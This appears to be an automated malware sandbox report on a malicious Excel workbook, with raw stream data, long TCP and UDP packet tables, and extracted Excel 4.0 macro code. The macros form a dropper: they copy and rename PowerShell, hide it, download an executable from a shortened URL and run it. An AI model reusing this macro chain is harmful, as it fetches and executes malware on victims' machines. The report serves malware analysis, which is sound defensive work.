                                                                                                                                                                                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 08 00 00 00 38 00 00 00 0c 00 00 00 4c 00 00 00 0d 00 00 00 58 00 00 00 13 00 00 00 64 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0c 00 00 00 41 6c 65 78 69 73 20 55 5a 41 4e 00 40 00 00 00
                                                                                                                                                                                                                            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 65416
                                                                                                                                                                                                                            General
                                                                                                                                                                                                                            Stream Path:Workbook
                                                                                                                                                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                                            Stream Size:65416
                                                                                                                                                                                                                            Entropy:6.88571621138
                                                                                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                                                                                            Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . H P - P C s U Z A N B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . h . . . \\ : . # 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
                                                                                                                                                                                                                            Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 48 50 2d 50 43 73 20 55 5a 41 4e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                                                                            Macro 4.0 Code

                                                                                                                                                                                                                            "=EXEC(""cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit"")""=EXEC(""cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit"")""=EXEC(""cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'"")""=WAIT(NOW()+""00:00:03"")""=EXEC(""cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')"")""=EXEC(""cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item """"vc.exe"""" -Destination """"$env:appdata"""""")""=EXEC(""cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;"")"=PAUSE()

                                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Nov 19, 2020 09:32:52.715012074 CET49733443192.168.2.3104.20.138.65
                                                                                                                                                                                                                            Nov 19, 2020 09:32:52.734790087 CET44349733104.20.138.65192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:52.734889030 CET49733443192.168.2.3104.20.138.65
                                                                                                                                                                                                                            Nov 19, 2020 09:32:52.814364910 CET49733443192.168.2.3104.20.138.65
                                                                                                                                                                                                                            Nov 19, 2020 09:32:52.831073999 CET44349733104.20.138.65192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:52.833165884 CET44349733104.20.138.65192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:52.833189011 CET44349733104.20.138.65192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:52.833199024 CET44349733104.20.138.65192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:52.833246946 CET49733443192.168.2.3104.20.138.65
                                                                                                                                                                                                                            Nov 19, 2020 09:32:52.838095903 CET49733443192.168.2.3104.20.138.65
                                                                                                                                                                                                                            Nov 19, 2020 09:32:52.854613066 CET44349733104.20.138.65192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:52.854893923 CET44349733104.20.138.65192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:52.906893969 CET49733443192.168.2.3104.20.138.65
                                                                                                                                                                                                                            Nov 19, 2020 09:32:52.923342943 CET44349733104.20.138.65192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.401897907 CET44349733104.20.138.65192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.401942015 CET44349733104.20.138.65192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.401971102 CET44349733104.20.138.65192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.402004957 CET44349733104.20.138.65192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.402069092 CET49733443192.168.2.3104.20.138.65
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.402123928 CET49733443192.168.2.3104.20.138.65
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.459614038 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.471981049 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.472218990 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.474103928 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.486398935 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.491949081 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.492048979 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.492182016 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.492491961 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.492600918 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.492669106 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.681525946 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.693821907 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.694204092 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.710333109 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.722830057 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744155884 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744179964 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744191885 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744199991 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744215965 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744230032 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744239092 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744251966 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744266033 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744293928 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744302988 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744314909 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744323015 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744334936 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744348049 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744355917 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744368076 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744374990 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744380951 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744394064 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744398117 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744404078 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744410038 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744422913 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744440079 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744452953 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744472027 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744489908 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744493961 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744509935 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744518995 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744524956 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744529963 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744546890 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744564056 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744600058 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.744683981 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745109081 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745197058 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745378017 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745414972 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745481014 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745562077 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745574951 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745621920 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745654106 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745678902 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745697021 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745708942 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745748043 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745780945 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.745856047 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746119976 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746197939 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746296883 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746315002 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746381998 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746382952 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746398926 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746416092 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746433973 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746450901 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746464014 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746469975 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746486902 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746490002 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746507883 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746526003 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746540070 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746542931 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746562004 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746575117 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746586084 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746614933 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746649027 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746743917 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746751070 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746752977 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746767998 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.746819973 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757181883 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757206917 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757261992 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757508039 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757533073 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757551908 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757570982 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757570982 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757606983 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757698059 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757721901 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757740021 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757775068 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757795095 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757812023 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757813931 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757831097 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757843018 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757930994 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757949114 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757966995 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.757983923 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.758014917 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.758121967 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.758140087 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.758161068 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.758181095 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.758191109 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.758198977 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.758217096 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.758230925 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.758269072 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.758301973 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.758320093 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.758332014 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.758352041 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.758367062 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.758373976 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.758443117 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.758968115 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.758994102 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759010077 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759028912 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759046078 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759046078 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759069920 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759094000 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759149075 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759169102 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759186983 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759224892 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759309053 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759325027 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759341002 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759362936 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759371996 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759382963 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759391069 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759419918 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759438992 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759462118 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759494066 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759512901 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759660006 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759695053 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759715080 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759733915 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759804010 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759828091 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759870052 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759926081 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759943008 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.759984016 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.760035038 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.760083914 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.760101080 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.760149002 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.765600920 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.766422987 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.770040989 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.770203114 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.770250082 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.770277977 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.770560026 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.770591021 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.770622015 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.770663977 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.770690918 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.770786047 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.770803928 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.770819902 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.770838022 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.770848036 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.770854950 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.770872116 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.770883083 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.770890951 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.770909071 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.770917892 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.770951033 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.771065950 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.771097898 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.771121025 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.771152020 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.771161079 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.771178007 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.771205902 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.771208048 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.771229029 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.771246910 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.771253109 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.771297932 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.771317005 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.771334887 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.771351099 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.771378040 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.772911072 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.773907900 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.778013945 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.778040886 CET44349734162.159.129.233192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.778090954 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:53.848396063 CET49734443192.168.2.3162.159.129.233
                                                                                                                                                                                                                            Nov 19, 2020 09:32:55.179301023 CET49733443192.168.2.3104.20.138.65
                                                                                                                                                                                                                            Nov 19, 2020 09:32:55.180057049 CET49734443192.168.2.3162.159.129.233

                                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Nov 19, 2020 09:31:31.741789103 CET6083153192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:31:31.754936934 CET53608318.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:31:32.903134108 CET6010053192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:31:32.915582895 CET53601008.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:31:33.916826010 CET5319553192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:31:33.929847956 CET53531958.8.8.8192.168.2.3
                                                                                                                                                                                                                            Nov 19, 2020 09:31:35.075479031 CET5014153192.168.2.38.8.8.8
                                                                                                                                                                                                                            Nov 19, 2020 09:31:35.089077950 CET53501418.8.8.8192.168.2.3
